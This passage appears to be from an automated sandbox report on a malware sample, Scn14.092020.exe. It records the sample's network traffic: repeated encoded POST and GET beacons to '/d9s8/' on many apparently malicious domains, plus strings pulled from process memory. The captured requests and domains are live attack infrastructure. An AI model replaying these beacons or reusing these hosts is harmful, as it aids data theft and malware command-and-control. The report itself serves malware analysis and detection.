53 4d 66 43 6d 73 62 6d 51 74 68 64 7e 43 67 7a 39 6e 6f 33 66 34 6e 79 6a 44 38 47 31 4f 50 4b 4e 79 6a 66 6a 5f 68 44 34 4c 4d 50 62 69 4f 64 68 48 34 47 38 46 38 52 55 47 79 54 49 51 71 61 6f 47 54 43 56 4f 46 62 43 34 74 64 46 6e 33 50 4b 6c 30 59 42 76 52 61 78 79 41 59 79 4a 6e 6c 48 44 38 67 70 4d 75 34 51 67 74 74 62 48 6e 4b 77 6a 35 31 51 41 64 36 63 67 63 43 43 79 68 38 30 35 31 31 66 47 6d 68 41 36 44 33 63 76 34 70 32 4b 62 6d 45 45 43 64 69 55 59 2d 67 5a 50 59 52 6b 74 6d 7a 4b 74 5a 54 70 43 55 37 41 36 37 37 5f 47 34 72 57 41 53 30 78 55 6c 53 54 28 4a 6c 68 69 59 7e 59 6c 4f 6a 51 41 2e 00 00 00 00 00 00 00 00 Data Ascii: 
Fzr4zDK=gg1ok2Cv51TgYIkZWdpg21eOlrnFJxcYmNcqoolGrlgjFr3oIBl1rnzA96rL(_(722PgPZhybM9f5J9pvy~b5smvGOF6mCioaOt-9ovMNLGN5sD1G-tXRLr2z-vRbWqfUvVTYhQaWipbKRjxjlfS4vfnQ0RU841dc0RpsYHVEeTLj3cWbrkORL0XDKqnLWZUUNlCgfpT93sHSMfCmsbmQthd~Cgz9no3f4nyjD8G1OPKNyjfj_hD4LMPbiOdhH4G8F8RUGyTIQqaoGTCVOFbC4tdFn3PKl0YBvRaxyAYyJnlHD8gpMu4QgttbHnKwj51QAd6cgcCCyh80511fGmhA6D3cv4p2KbmEECdiUY-gZPYRktmzKtZTpCU7A677_G4rWAS0xUlST(JlhiY~YlOjQA.
          Source: global trafficHTTP traffic detected: POST /d9s8/ HTTP/1.1Host: www.martjeje2.infoConnection: closeContent-Length: 417Cache-Control: no-cacheOrigin: http://www.martjeje2.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.martjeje2.info/d9s8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 46 7a 72 34 7a 44 4b 3d 34 48 4d 37 4e 2d 6f 43 42 38 37 65 6e 6b 59 78 64 43 75 7a 7e 4e 35 4d 71 5a 56 48 74 38 35 37 66 4a 47 36 6b 34 4a 74 66 35 6d 32 51 2d 77 63 72 6b 49 4e 74 6d 71 34 52 36 70 49 77 72 4d 55 6b 66 4f 5a 39 69 71 65 39 62 6a 79 33 49 54 79 30 64 62 76 6f 52 46 6a 7a 64 55 38 58 36 58 48 4f 6b 42 65 43 61 6a 4c 35 46 75 55 6d 66 37 62 6d 79 61 76 68 55 39 31 56 31 43 45 76 74 51 33 6a 4f 56 71 73 53 4e 35 56 78 4f 5f 47 68 35 65 45 34 34 50 39 77 42 47 49 76 53 71 35 44 43 68 78 57 45 75 50 62 54 36 4b 75 5a 52 49 44 4e 39 38 4a 41 6c 75 6b 50 32 51 6f 67 75 62 42 77 4e 52 39 4b 6b 46 4d 79 31 59 46 46 41 32 54 59 67 4d 35 75 4c 38 6e 4d 67 53 4d 28 74 41 63 41 68 6c 69 56 69 31 4b 30 36 73 33 48 76 76 7a 67 56 41 64 36 44 76 49 52 45 39 76 71 78 74 57 79 75 6a 5a 4f 4f 47 54 4f 6e 28 34 6a 77 28 5a 42 45 64 52 43 56 38 52 4e 4e 4e 4c 4d 56 4d 6b 35 6d 4b 47 4d 4d 75 4d 6c 46 55 38 6a 46 39 53 34 45 68 34 68 62 43 72 59 30 42 67 64 56 37 61 4e 51 63 30 76 4a 4b 61 52 48 4a 34 57 69 79 78 6b 6a 34 71 44 50 4b 68 7a 5a 6b 43 61 76 74 64 4b 70 77 39 45 76 37 44 7e 48 52 72 42 62 66 66 54 57 45 65 34 74 39 4f 51 63 79 54 63 42 41 70 58 79 31 59 55 4b 5a 66 64 76 46 48 44 30 69 36 56 39 5a 5a 67 38 71 74 6b 2e 00 00 00 00 00 00 00 00 Data Ascii: 
Fzr4zDK=4HM7N-oCB87enkYxdCuz~N5MqZVHt857fJG6k4Jtf5m2Q-wcrkINtmq4R6pIwrMUkfOZ9iqe9bjy3ITy0dbvoRFjzdU8X6XHOkBeCajL5FuUmf7bmyavhU91V1CEvtQ3jOVqsSN5VxO_Gh5eE44P9wBGIvSq5DChxWEuPbT6KuZRIDN98JAlukP2QogubBwNR9KkFMy1YFFA2TYgM5uL8nMgSM(tAcAhliVi1K06s3HvvzgVAd6DvIRE9vqxtWyujZOOGTOn(4jw(ZBEdRCV8RNNNLMVMk5mKGMMuMlFU8jF9S4Eh4hbCrY0BgdV7aNQc0vJKaRHJ4Wiyxkj4qDPKhzZkCavtdKpw9Ev7D~HRrBbffTWEe4t9OQcyTcBApXy1YUKZfdvFHD0i6V9ZZg8qtk.
          Source: global trafficHTTP traffic detected: POST /d9s8/ HTTP/1.1Host: www.kq-iot.comConnection: closeContent-Length: 417Cache-Control: no-cacheOrigin: http://www.kq-iot.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.kq-iot.com/d9s8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 46 7a 72 34 7a 44 4b 3d 70 69 64 69 57 76 47 65 70 4a 77 51 79 68 74 41 4f 73 77 54 76 62 46 52 78 78 4f 45 45 33 6b 7a 31 5f 76 6c 7a 41 7a 6c 46 67 39 68 46 53 35 62 58 42 30 30 44 5f 69 61 6d 62 4d 48 5a 33 73 55 64 55 4f 35 79 74 47 77 77 49 44 57 68 36 33 4e 75 4d 47 58 7e 63 45 6b 44 47 6f 36 69 70 76 39 44 5a 54 45 6c 4c 48 30 77 64 4a 43 4e 58 48 6b 76 4c 6b 30 48 79 38 6c 63 6d 38 57 51 33 35 77 7a 50 44 4a 52 33 4a 76 70 55 78 42 43 5f 73 6a 33 49 33 37 71 75 69 50 42 66 37 46 48 73 54 48 41 37 73 42 46 56 63 30 6a 43 54 54 56 70 75 4a 6c 6b 53 4d 70 61 71 64 78 36 33 50 6e 32 72 4b 79 39 4a 77 74 71 55 68 47 39 59 54 33 4a 54 50 66 34 4a 6b 4d 52 6d 38 72 56 73 48 51 68 59 7a 42 74 47 32 75 58 50 57 50 55 55 65 4f 77 65 77 70 61 7a 36 4b 6d 69 6d 64 42 54 38 57 4b 58 39 44 57 77 63 32 4f 77 33 6e 59 69 58 49 6a 70 46 35 75 74 71 69 68 28 68 72 5a 38 30 6d 4b 76 6a 30 4b 37 49 57 39 48 79 4d 74 66 6f 46 71 34 77 30 35 35 75 4a 57 77 57 65 44 47 43 4e 67 62 56 73 71 67 52 34 58 5a 6f 58 54 7e 57 6c 36 6d 7a 28 35 66 5a 46 5f 54 4e 28 4e 56 4c 57 76 34 72 58 62 45 4b 66 50 6c 36 65 6a 54 72 68 66 36 66 6d 74 6c 37 64 67 6d 42 72 49 50 4e 53 65 4e 6e 53 55 38 45 4b 31 39 57 53 57 47 58 38 6c 30 66 70 2d 47 2d 7e 69 55 2e 00 00 00 00 00 00 00 00 Data Ascii: 
Fzr4zDK=pidiWvGepJwQyhtAOswTvbFRxxOEE3kz1_vlzAzlFg9hFS5bXB00D_iambMHZ3sUdUO5ytGwwIDWh63NuMGX~cEkDGo6ipv9DZTElLH0wdJCNXHkvLk0Hy8lcm8WQ35wzPDJR3JvpUxBC_sj3I37quiPBf7FHsTHA7sBFVc0jCTTVpuJlkSMpaqdx63Pn2rKy9JwtqUhG9YT3JTPf4JkMRm8rVsHQhYzBtG2uXPWPUUeOwewpaz6KmimdBT8WKX9DWwc2Ow3nYiXIjpF5utqih(hrZ80mKvj0K7IW9HyMtfoFq4w055uJWwWeDGCNgbVsqgR4XZoXT~Wl6mz(5fZF_TN(NVLWv4rXbEKfPl6ejTrhf6fmtl7dgmBrIPNSeNnSU8EK19WSWGX8l0fp-G-~iU.
          Source: global trafficHTTP traffic detected: POST /d9s8/ HTTP/1.1Host: www.ekcraftmasters.comConnection: closeContent-Length: 417Cache-Control: no-cacheOrigin: http://www.ekcraftmasters.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ekcraftmasters.com/d9s8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 46 7a 72 34 7a 44 4b 3d 66 2d 4b 73 53 52 78 45 69 75 39 46 7e 31 54 37 34 48 6f 2d 42 6a 6f 73 32 46 72 58 30 53 49 6b 64 72 66 4d 6a 5a 37 76 5a 72 53 58 47 35 6e 61 45 71 33 62 49 76 6c 43 7a 67 57 39 54 6b 62 56 45 73 47 6a 28 77 56 77 4b 6e 70 38 50 62 51 41 59 54 4c 76 55 50 46 47 46 61 44 6b 6c 38 59 6c 77 31 7e 4e 37 77 54 47 28 50 5a 59 49 33 56 71 30 4f 32 74 51 6f 7e 58 6a 69 7a 2d 37 43 54 6f 55 49 53 4e 4e 75 6c 4c 66 6f 6d 4a 4c 67 46 4a 28 6e 63 72 49 42 39 78 78 52 5a 33 31 54 6f 6a 65 79 63 4e 68 2d 43 4f 52 76 34 72 52 42 53 52 52 58 4d 6d 4d 2d 39 2d 32 4c 41 6c 78 2d 41 68 6d 55 5a 70 45 57 75 33 4c 63 73 72 4f 4b 49 44 74 71 63 6d 4e 4d 39 63 77 4e 75 32 59 52 6e 6e 6e 47 71 4d 6f 6b 74 59 75 41 4b 67 65 75 47 47 64 6e 71 57 38 41 64 44 35 44 76 39 55 68 73 72 68 57 48 45 76 77 6a 4e 59 6d 65 69 56 36 34 2d 4e 32 32 72 61 4a 49 4e 63 32 51 68 50 38 79 4c 38 32 69 52 77 45 70 70 45 38 68 63 70 39 4b 4a 31 30 75 42 55 78 43 5a 76 4c 6a 69 58 56 49 33 70 52 79 58 54 5a 70 53 66 31 7e 57 42 44 62 50 65 38 65 58 57 47 46 49 47 5a 51 5a 55 4a 70 6f 7a 57 56 75 46 58 45 36 6b 52 35 6d 62 44 68 6e 66 78 51 79 4a 71 78 68 38 4b 67 49 32 5f 31 72 43 4f 5a 32 59 30 61 2d 7a 77 46 49 46 4a 64 53 48 6e 43 6b 7e 2d 49 2e 00 00 00 00 00 00 00 00 Data Ascii: 
Fzr4zDK=f-KsSRxEiu9F~1T74Ho-Bjos2FrX0SIkdrfMjZ7vZrSXG5naEq3bIvlCzgW9TkbVEsGj(wVwKnp8PbQAYTLvUPFGFaDkl8Ylw1~N7wTG(PZYI3Vq0O2tQo~Xjiz-7CToUISNNulLfomJLgFJ(ncrIB9xxRZ31TojeycNh-CORv4rRBSRRXMmM-9-2LAlx-AhmUZpEWu3LcsrOKIDtqcmNM9cwNu2YRnnnGqMoktYuAKgeuGGdnqW8AdD5Dv9UhsrhWHEvwjNYmeiV64-N22raJINc2QhP8yL82iRwEppE8hcp9KJ10uBUxCZvLjiXVI3pRyXTZpSf1~WBDbPe8eXWGFIGZQZUJpozWVuFXE6kR5mbDhnfxQyJqxh8KgI2_1rCOZ2Y0a-zwFIFJdSHnCk~-I.
          Source: global traffic | HTTP traffic detected:
          POST /d9s8/ HTTP/1.1
          Host: www.hqxmf.com
          Connection: close
          Content-Length: 417
          Cache-Control: no-cache
          Origin: http://www.hqxmf.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
          Content-Type: application/x-www-form-urlencoded
          Accept: */*
          Referer: http://www.hqxmf.com/d9s8/
          Accept-Language: en-US
          Accept-Encoding: gzip, deflate
          Data Ascii: Fzr4zDK=oiUxMjKDFgoL8fIoyDHIPZ7CL4mELCaTDjO4GytFm2pyVItYfDr5vN5ZV9Bd6_IbIHB2uxcmYPzUIxismLWYsuxezN~uTmTN8vrX1sR_nRmlsXjjUNigjG70cncqpXHEI0cPEqPZKYytg2EYQfb_Y9hA0JUXi7J9y4dcMOObIXt7AZLGHnLeRWh2(fmD9-lbGGabT_3YReGhsIuP6QzHB0OSKNkqDeMARy9PAiu-LroAM_qOapNLO8JttA(aW_5tkG1E7QKtLC4UkFd3UgzX7nE6DKxzAY3qg_CJw2wWcqsujoRqMuyRFrfMjyih8YzNLjVYwoFnOz7r~CLYW_mzxKanqCKfFi6s4jyZ1idS8-ZhOZMedd5T(dw4LY9Y3teAhd0rizj1Y_PWnBQdIAFqVqo.

          Source: global traffic | HTTP traffic detected:
          POST /d9s8/ HTTP/1.1
          Host: www.panoramazoom.com
          Connection: close
          Content-Length: 417
          Cache-Control: no-cache
          Origin: http://www.panoramazoom.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
          Content-Type: application/x-www-form-urlencoded
          Accept: */*
          Referer: http://www.panoramazoom.com/d9s8/
          Accept-Language: en-US
          Accept-Encoding: gzip, deflate
          Data Ascii: Fzr4zDK=4CwpkbJN5AQAfDGwHUBTS_lFJv0lmcRUtof8mkO_pieBe22kaNTlpRgW0QpuBFNYyid1pJd3ye3epKI2fOWq6BtKvNQ1s-GZG0Jz5_MpDPySP0Ss7GjzqKMVOCWdsUsAyYcmjsRjmG0wP4wPZAS9~jSGg_WFrHrItp~hP88rKLoWzxNlkCpqRAEaOpdThyj20oBakQholiTQVw(1b0E9JtcjbQ3jqdbemja9MVucFPhYjrTcZDsL5oxhI9kw7sycIt7O0kozEGbdi0vl9qFL5P~jRKxaqzarp_ykR6(Oe_CUqOkiCrEoRc~3nDYoBruAVSYe1u9DZLZMQk5NOjWOuRIxGU76SPF3YO1XMsNGrja_bXpjQuLD3SSd(DCzG3cYy7FQWEiiu7GzalG7Zy4CA8s.

          Source: global traffic | HTTP traffic detected:
          POST /d9s8/ HTTP/1.1
          Host: www.ashleygrady.com
          Connection: close
          Content-Length: 417
          Cache-Control: no-cache
          Origin: http://www.ashleygrady.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
          Content-Type: application/x-www-form-urlencoded
          Accept: */*
          Referer: http://www.ashleygrady.com/d9s8/
          Accept-Language: en-US
          Accept-Encoding: gzip, deflate
          Data Ascii: Fzr4zDK=5zFbd2KHg6tlb4pBVMD3FLj4MmvyMs7fYbxqDZ~t2N~VoQ3BlX38izifawCb(pNYa50f0n5s~iB40_3Vexcg6VC6IYY-i_kOxbVkCozEU5spQmHhWR4rmRof8hls4EajoHBxO6koU8MtRnRMvYRGuBRxX-sEElgShbAR9wMKZ33MVR5pFkTFk8Sa3Sc6IgpCqi5eeTV-i4QibZJzxKUyUBAd6R7kHu7oYw5SZoLHCrp6gsrVgIgviiKXMLs4T5FP2PB92rtKNBb1~01fcXHkANCYuW1PRO1JaBLtkHFe8VOZXFAQ6UHLqo2aWvBu0vXuvvin6xBRYEu7AmRF1brQhnG6u1FCfwsZL1ZuJuHDs5TUL70NwDNHWUR_k3~w(ZTWdzapzbNGbDoZ6YhUgT5-fbs.
          Source: global traffic | HTTP traffic detected:
          GET /d9s8/?cj=VTjDONEhQdtp_D7&Fzr4zDK=yQsfb6F+aE13Jx6qI3j1CMlHibkP501s7Hi6bb3WKNeqcCrzTo1bPmy/qNeqrRFHbPNe/5B8Pw== HTTP/1.1
          Host: www.aktivasi-asuransi-bukalapak.com
          Connection: close

          Source: global traffic | HTTP traffic detected:
          GET /d9s8/?Fzr4zDK=cO0bqnodE8Uodepscc2XXc+fybp4dBOkcNItlx0mXpHFPbxkNxOWsoUK9bD544eiDWVMpw/c/g==&cj=VTjDONEhQdtp_D7 HTTP/1.1
          Host: www.keebcat.com
          Connection: close

          Source: global traffic | HTTP traffic detected:
          GET /d9s8/?cj=VTjDONEhQdtp_D7&Fzr4zDK=kyZTX99LiW/icy84gI8HitXVOdgKxOvA9fmCXsGAN7TtQxOyGGUpuanA93xRa5BlVihhxKWfRA== HTTP/1.1
          Host: www.nittayabeauty.com
          Connection: close

          Source: global traffic | HTTP traffic detected:
          GET /d9s8/?Fzr4zDK=VEf8k5jTZUymsLuztDlUroR4Tha6hY/2aUGXaeeuAgJZc/heECk8lEdTltPR5tJ2I5Jl1jMjmA==&cj=VTjDONEhQdtp_D7 HTTP/1.1
          Host: www.jblmhomestore.net
          Connection: close

          Source: global traffic | HTTP traffic detected:
          GET /d9s8/?cj=VTjDONEhQdtp_D7&Fzr4zDK=viBS6Wze00HUNqFEE58ery/tqe73OVEI1otdtPhhnn8HDYG2Px46lSa5vqDPzebR02j5AZFkbQ== HTTP/1.1
          Host: www.chehol.directory
          Connection: close

          Source: global traffic | HTTP traffic detected:
          GET /d9s8/?Fzr4zDK=3F4BTbkTDsrb23tZAXb3hdJ3+Zxxneo5KOr91LRTQbT8RfY+vB5Yp2XFHslzxo1OscfD9AW+8w==&cj=VTjDONEhQdtp_D7 HTTP/1.1
          Host: www.martjeje2.info
          Connection: close

          Source: global traffic | HTTP traffic detected:
          GET /d9s8/?cj=VTjDONEhQdtp_D7&Fzr4zDK=mgpYILHtvr0Mwg0MZYgF77N/xUypMH4IxLzlgyPIKQxLVyQFR0wmQaHW4IQmamE6UWjr48at2Q== HTTP/1.1
          Host: www.kq-iot.com
          Connection: close

          Source: global traffic | HTTP traffic detected:
          GET /d9s8/?Fzr4zDK=Q8+WM2Bomf5ni0SwuCpoBHUW8n6b7DImGNKI7675UaWCEqnlNuWrArVDxgeCSXP0JeKD6A53Gw==&cj=VTjDONEhQdtp_D7 HTTP/1.1
          Host: www.ekcraftmasters.com
          Connection: close

          Source: global traffic | HTTP traffic detected:
          GET /d9s8/?cj=VTjDONEhQdtp_D7&Fzr4zDK=nggLSHHwBxgJuORrvzKJVs32BLSeJBWsdDbHUzpPnmBTU59XQSi8nYsaBuJZ1tItBxdMzB9YIA== HTTP/1.1
          Host: www.hqxmf.com
          Connection: close

          Source: global traffic | HTTP traffic detected:
          GET /d9s8/?cj=VTjDONEhQdtp_D7&Fzr4zDK=nggLSHHwBxgJuORrvzKJVs32BLSeJBWsdDbHUzpPnmBTU59XQSi8nYsaBuJZ1tItBxdMzB9YIA== HTTP/1.1
          Host: www.hqxmf.com
          Connection: close

          Source: global traffic | HTTP traffic detected:
          GET /d9s8/?Fzr4zDK=3AET6+Fblh40BCXQRB4KEY1DB+MApctu3/uB71K+4nCKf3Spdfy3uFQQowE4NnJx4EY2v4wM1g==&cj=VTjDONEhQdtp_D7 HTTP/1.1
          Host: www.panoramazoom.com
          Connection: close

          Source: global traffic | HTTP traffic detected:
          GET /d9s8/?cj=VTjDONEhQdtp_D7&Fzr4zDK=2xxhDTKogYVwMqkKCpG9QsOba3/Ca+nzIrlpYJOr5IqlgQrpv0G7wV/gFRzM0ZtWPZ4zyVFx2w== HTTP/1.1
          Host: www.ashleygrady.com
          Connection: close

          Source: unknown | DNS traffic detected: queries for: www.aktivasi-asuransi-bukalapak.com
          Source: unknown | HTTP traffic detected:
          POST /d9s8/ HTTP/1.1
          Host: www.keebcat.com
          Connection: close
          Content-Length: 417
          Cache-Control: no-cache
          Origin: http://www.keebcat.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
          Content-Type: application/x-www-form-urlencoded
          Accept: */*
          Referer: http://www.keebcat.com/d9s8/
          Accept-Language: en-US
          Accept-Encoding: gzip, deflate
          Data Ascii: Fzr4zDK=TMAh0Ao_FuFZFpYwBcvaWKeFlYJSS0yBMqpV(j8GeLvwOoZVCVv4s8dH~qPD9qWGN1VEswTK7Wj7F6zgB_Vsjsk_1bDt4EtEKBOZT8Z0Gb1oN4imx2v6fX38gWuLG3DLkBVP4_xaF01YoXE4fw(RCPFE228Sj-AAI35eJqiQsP2mNGBDqM~XVdYCGGiiTWDLgZ1ULbgqxjCo~sHXjWfb9NxLxp8vsjwJIIfoH4r8HKFtUn1_Y0oN7lKApGpHNpLm~Am269lv2g4tpu(96B9pbvHGILLOp-sTndv-hJOSvsum6FhgbCKDXEzGxrq1~1oYWzmkHe0VlmviYRGWb-CNfCnIpp(KU1dCYn44LSPZtjfmKwPDIBgtns4lGmC8M2zOR-5FyetGzL0ojOd6pE0amWU.

          Source: global traffic | HTTP traffic detected:
          HTTP/1.1 404 Not Found
          Server: nginx
          Date: Mon, 14 Sep 2020 13:36:34 GMT
          Content-Type: text/html; charset=UTF-8
          Content-Length: 146
          Connection: close
          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: Scn14.092020.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
          Source: Scn14.092020.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
          Source: Scn14.092020.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
          Source: Scn14.092020.exe | String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
          Source: Scn14.092020.exe | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
          Source: Scn14.092020.exe | String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
          Source: explorer.exe, 00000002.00000000.258611599.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmp | String found in binary or memory: http://i1.cdn-image.com/__media__/pics/12471/logo.png)
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmp | String found in binary or memory: http://i1.cdn-image.com/__media__/pics/12471/search-icon.png)
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot?#iefix
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otf
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-b
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot?#iefix
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.otf
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.svg#ubuntu-r
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.ttf
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff2
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/arrow.png)
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/kwbg.jpg)
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/bodybg.png)
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/libgh.png)
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/js/min.js?v2.2
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/pics/12471/libg.png)
          Source: Scn14.092020.exe | String found in binary or memory: http://ocsp.digicert.com0C
          Source: Scn14.092020.exe | String found in binary or memory: http://ocsp.digicert.com0O
          Source: explorer.exe, 00000002.00000000.258611599.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000002.00000000.258611599.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000002.00000000.258611599.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000002.00000000.258611599.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000002.00000000.258611599.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000002.00000000.258611599.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000002.00000000.258611599.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000002.00000000.258611599.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000002.00000000.258611599.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000002.00000000.258611599.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000002.00000000.258611599.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000002.00000000.258611599.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000002.00000000.258611599.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000002.00000000.258611599.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000002.00000000.258611599.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000002.00000000.258611599.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000002.00000000.258611599.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000002.00000000.258611599.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmp | String found in binary or memory: http://www.panoramazoom.com/10_Best_Mutual_Funds.cfm?fp=Oi7aXOv0PsK81jpYl4yd2uiVyxdpDUznP7KDJEVTi%2B
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmp | String found in binary or memory: http://www.panoramazoom.com/Anti_Wrinkle_Creams.cfm?fp=Oi7aXOv0PsK81jpYl4yd2uiVyxdpDUznP7KDJEVTi%2Ba
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmp | String found in binary or memory: http://www.panoramazoom.com/Best_Penny_Stocks.cfm?fp=Oi7aXOv0PsK81jpYl4yd2uiVyxdpDUznP7KDJEVTi%2Baf3
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmp | String found in binary or memory: http://www.panoramazoom.com/Cheap_Air_Tickets.cfm?fp=Oi7aXOv0PsK81jpYl4yd2uiVyxdpDUznP7KDJEVTi%2Baf3
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmp | String found in binary or memory: http://www.panoramazoom.com/Contact_Lens.cfm?fp=Oi7aXOv0PsK81jpYl4yd2uiVyxdpDUznP7KDJEVTi%2Baf3xgJjo
